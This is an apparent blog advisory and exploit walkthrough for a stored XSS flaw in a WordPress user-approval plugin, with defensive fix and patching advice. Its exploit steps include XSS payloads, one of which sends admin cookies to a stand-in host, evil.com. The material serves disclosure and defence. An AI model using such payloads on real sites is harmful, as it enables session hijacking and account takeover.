CVE-2023-32738 - Exploiting Stored XSS in Eonet Manual User Approve Plugin (<= 2.1.3) – Deep Dive & Exploit Guide

---

If you use WordPress and the Eonet Manual User Approve plugin by Alkaweb, you need to pay attention to CVE-2023-32738. This vulnerability allows an attacker with admin or higher privileges to inject persistent (stored) Cross-Site Scripting (XSS) payloads – a serious risk if you have multiple admins or plugins that elevate user roles.

Let’s break down what this means, how it works, and what you should do to protect your site.

What is CVE-2023-32738?

This CVE is about a Stored XSS vulnerability found in the Alkaweb Eonet Manual User Approve plugin for WordPress. The vulnerable versions are <= 2.1.3.

> Stored XSS lets an attacker save malicious JavaScript code in the WordPress database, so that it runs every time a certain page or admin screen is loaded.

CVE page: NVD – CVE-2023-32738

User Approvement Note Input Not Sanitized:

The plugin allows admins to approve or deny newly registered users, and to leave a “note” with their approval or rejection. The problem? This note field doesn’t sanitize or escape special HTML/JavaScript characters.

Payload is Saved (Stored):

When an admin enters malicious JavaScript in the note field and submits, the code is saved to the database.

Payload is Executed:

Later, whenever another admin views the user approval notes in the admin panel, the malicious code runs in their browser session, stealing cookies or performing actions as that user.

Step 1: Log in to WordPress as an admin user.

Step 2: Go to the Eonet User Approve management screen and find a pending user.

Step 3: In the “note” field, enter a JavaScript payload like

<script>alert('XSS by CVE-2023-32738')</script>

Or, for a more serious attack (steal cookies)

<img src=x onerror="fetch('https://evil.com?cookie='+document.cookie)">

Step 4: Submit the approval/rejection with the malicious note.

Step 5: When another admin views the user approval page and reads the note, the JavaScript executes.

Example Code Snippet (simulated vulnerable part)

// A representation of vulnerable handler:
$note = $_POST['note']; // NOT sanitized
update_user_meta($user_id, 'approval_note', $note);

// Later, displayed like this:
echo get_user_meta($user_id, 'approval_note', true); // Directly output

The missing step: Escape the output with esc_html(), esc_attr(), or wp_kses_post().

Why is This Bad?

- Stored XSS is powerful. The malicious code is saved in the database and can target any admin who views the affected record.

Attackers can hijack sessions, steal cookies, or perform admin actions.

- If a less-privileged plugin is used to automate or manage users, and it exposes the note field, it might be a vessel for privilege escalation.

*Directly?* No, attackers must be authenticated as admin+.

- Indirection: If you have multiple admins, a trusted admin’s account could be used to backdoor other admins.
- Multisite/Multiplugin scenarios: A compromised plugin that gives temporary admin-like rights can use this XSS for persistence.

Official Fix

The plugin authors fixed this after version 2.1.3. You should upgrade to the latest version immediately.

WordPress.org Eonet Manual User Approve plugin

Links & References

- CVE-2023-32738 NVD Listing
- Wordfence Advisory
- Plugin Page
- WPScan Entry

Don’t use the plugin if you have multiple admins and can’t patch.

- Use the Wordfence or Sucuri firewall to detect XSS attacks.

Final Notes

While this vulnerability doesn’t allow just anyone to attack your site, it’s still a serious risk in admin-heavy or multi-user WordPress sites. Always keep plugins up to date and remember: even trusted code can bite you, especially in the world of WordPress.

*Stay safe, and patch early!*

*This exclusive guide was created for all you WordPress site owners who need actionable info in plain language. If you need help, ask in the plugin’s support forum.*

Timeline

Published on: 10/27/2023 21:15:08 UTC
Last modified on: 11/07/2023 15:07:59 UTC